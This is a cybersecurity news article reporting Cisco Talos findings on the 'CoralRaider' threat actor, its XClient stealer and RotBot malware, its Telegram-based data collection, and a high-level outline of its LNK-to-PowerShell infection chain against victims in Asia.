Sunday, July 21, 2024

CoralRaider Hackers Steals Login Credentials, Financial Data & Social Media Logins

A new threat actor dubbed “CoralRaider” targets victims’ financial information, login credentials, and social media profiles—including accounts for businesses and advertisements.

The group, which is of Vietnamese origin, has been active since at least 2023 and targets victims in several Asian and Southeast Asian countries. 

In the recent campaign, the attackers used XClient stealer and RotBot, a customized version of QuasarRAT, as payloads.

The IP address, ASN, and active processes on the victim’s computer are among several tests that RotBot, a remote access tool (RAT), runs on it to avoid detection. 

The XClient stealer offers significant information-stealing capabilities due to its plugin module and a variety of modules for conducting remote administration operations.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Notable Tactics, Techniques, And Procedures (TTPs) Employed

According to Cisco Talos reports, the attacker utilized two Telegram bots: a “debug” bot for debugging and an “online” bot for receiving victim data. 

On the other hand, the “debug” bot’s desktop image and Telegram looked identical to those of the “online” bot.

This demonstrated that, while testing the bot, the actor may have compromised their surroundings. 

Telegram bots Used by attackers

Researchers’ investigation turned up two more pictures that showed several OneDrive folders. 

An Excel file that most likely contained the victims’ data was examined in another picture. The spreadsheet contains multiple tabs in Vietnamese. 

 “CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer”, Talos researchers shared with Cyber Security News.

“The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration”.

This malicious campaign is aimed at victims in South Korea, Bangladesh, Pakistan, Indonesia, Vietnam, India, China, and other countries in Asia and Southeast Asia. 

The Windows shortcut file serves as the campaign’s original vector. The actor’s method of giving the victims the LNKs is unknown at the moment.

Attack Flow

A malicious Windows shortcut file that downloads and launches an HTML application file (HTA) from a download site under the attacker’s control is the first step in the attack.

An embedded, obfuscated Visual Basic script runs when the HTA file is opened.

The PowerShell script that is embedded in the memory by the malicious Visual Basic script decrypts and sequentially runs three other PowerShell scripts that download and launch the RotBot, disable Windows and application notifications, bypass User Access Controls, and perform anti-VM and anti-analysis checks. 

On the victim’s computer, RotBot is downloaded and launched under the guise of the Printer Subsystem program “spoolsv.exe.” The threat actor has assembled and customized a RotBot specifically for this campaign. 

The XClient Stealer takes use of victims’ browser data, credit card numbers, and social network login passwords.

It targets the data files for Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browsers through the absolute paths of the corresponding browser installation paths. 

Lastly, the XClient stealer generates a ZIP package and saves the victim’s social media information, which is gathered into a text file in the local user profile temporary folder.

Use secure passwords and change them frequently to protect yourself from these dangerous attacks.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

Latest articles

Hackers Claiming Dettol Data Breach: 453,646 users Impacted

A significant data breach has been reported by a threat actor known as 'Hana,'...

CrowdStrike Update Triggers Widespread Windows BSOD Crashes

A recent update from cybersecurity firm CrowdStrike has caused significant disruptions for Windows users,...

Operation Spincaster Disrupts Approval Phishing Technique that Drains Victim’s Wallets

Chainalysis has launched Operation Spincaster, an initiative to disrupt approval phishing scams that have...

Octo Tempest Know for Attacking VMWare ESXi Servers Added RansomHub & Qilin to Its Arsenal

Threat actors often attack VMware ESXi servers since they accommodate many virtual machines, which...

TAG-100 Actors Using Open-Source Tools To Attack Gov & Private Orgs

Hackers exploit open-source tools to execute attacks because they are readily available, well-documented, and...

macOS Users Beware Of Weaponized Meeting App From North Korean Hackers

Meeting apps are often targeted and turned into weapons by hackers as they are...

Hackers Exploiting Legitimate RMM Tools With BugSleep Malware

Since October 2023, MuddyWater, which is an Iranian threat group linked to MOIS, has...
Guru baran
Guru baran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Free Webinar

Low Rate DDoS Attack

9 of 10 sites on the AppTrana network have faced a DDoS attack in the last 30 days.
Some DDoS attacks could readily be blocked by rate-limiting, IP reputation checks and other basic mitigation methods.
More than 50% of the DDoS attacks are employing botnets to send slow DDoS attacks where millions of IPs are being employed to send one or two requests per minute..
Key takeaways include:

  • The mechanics of a low-DDoS attack
  • Fundamentals of behavioural AI and rate-limiting
  • Surgical mitigation actions to minimize false positives
  • Role of managed services in DDoS monitoring

Related Articles